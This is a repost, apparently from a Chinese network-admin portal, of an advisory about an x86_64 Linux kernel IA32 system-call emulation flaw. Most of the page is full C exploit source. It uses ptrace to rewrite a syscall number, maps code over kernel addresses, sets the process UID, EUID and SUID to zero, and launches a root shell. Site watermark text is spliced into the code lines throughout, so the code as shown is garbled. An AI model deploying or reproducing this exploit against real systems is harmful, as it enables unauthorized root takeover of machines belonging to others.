| 网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 |
|
| Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道 |
Summary
Insufficient validation of general-purpose register in IA32 system call emulation code may lead to local system compromise on x86_64 platform.
Credit:
The information has been provided by Robert Swiecki.
中国网管联盟bitsCN.com
Details
Exploit:
/*
* exploit for x86_64 linux kernel ia32syscall emulation
* bug, discovered by Wojciech Purczynski <cliph_at_isec.pl>
*
* by
* Robert Swiecki <robert_at_swiecki.net>
* Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl>
* Pawel Pisarczyk <pawel_at_immos.com.pl>
* of ATM-Lab http://www.atm-lab.pl
*/ 网管u家bitscn.net
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h> 中国网管联盟bitsCN.com
uint32_t uid, euid, suid;
static void kernelmodecode(void)
{
int i;
uint8_t *gs;
uint32_t *ptr;
asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs)); 中国网管联盟bitsCN.com
for (i = 200; i < 1000; i+=1) {
ptr = (uint32_t*) (gs + i);
if ((ptr[0] == uid) && (ptr[1] == euid)
&& (ptr[2] == suid) && (ptr[3] == uid)) {
ptr[0] = 0; //UID
ptr[1] = 0; //EUID
ptr[2] = 0; //SUID
网管u家u.bitscn@com
break;
}
}
}
static void docall(uint64_t *ptr, uint64_t size)
{
getresuid(&uid, &euid, &suid);
网管网www_bitscn_com
uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);
网管朋友网www_bitscn_net
if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
printf("mmap fault\n");
exit(1);
} 网管u家u.bitsCN.com
for (; ptr < (tmp + size); ptr++)
*ptr = (uint64_t)kernelmodecode; 网管朋友网www_bitscn_net
__asm__("\n"
"\tmovq $0x101, %rax\n"
"\tint $0x80\n");
网管论坛bbs_bitsCN_com
printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
execl("/bin/sh", "bin/sh", 0);
printf("no /bin/sh ??\n");
exit(0);
} 网管网www.bitscn.com
int main(int argc, char **argv)
{
int pid, status, set = 0;
uint64_t rax;
uint64_t kern_s = 0xffffffff80000000;
uint64_t kern_e = 0xffffffff84000000;
uint64_t off = 0x0000000800000101 * 8;
if (argc == 4) {
docall((uint64_t*)(kern_s + off), kern_e - kern_s);
exit(0);
} 网管u家www.bitscn.net
if ((pid = fork()) == 0) {
ptrace(PTRACE_TRACEME, 0, 0, 0);
execl(argv[0], argv[0], "2", "3", "4", 0);
perror("exec fault");
exit(1);
}
if (pid == -1) {
printf("fork fault\n");
exit(1);
} 网管有家www.bitscn.net
for (;;) {
if (wait(&status) != pid)
continue;
if (WIFEXITED(status)) {
printf("Process finished\n");
break;
} 网管有家www.bitscn.net
if (!WIFSTOPPED(status))
continue;
网管u家u.bitscn@com
if (WSTOPSIG(status) != SIGTRAP) {
printf("Process received signal: %d\n", WSTOPSIG(status));
break;
} 网管朋友网www_bitscn_net
rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
if (rax == 0x000000000101) {
if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
printf("PTRACE_POKEUSER fault\n");
exit(1);
} 网管u家bitscn.net
set = 1;
}
if ((rax == 11) && set) {
ptrace(PTRACE_DETACH, pid, 0, 0);
for(;;)
sleep(10000);
} 网管bitscn_com
if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
printf("PTRACE_SYSCALL fault\n");
exit(1);
}
} 网管u家u.bitscn@com
return 0;
} 网管u家bitscn.net
|
0
|
评论加载中…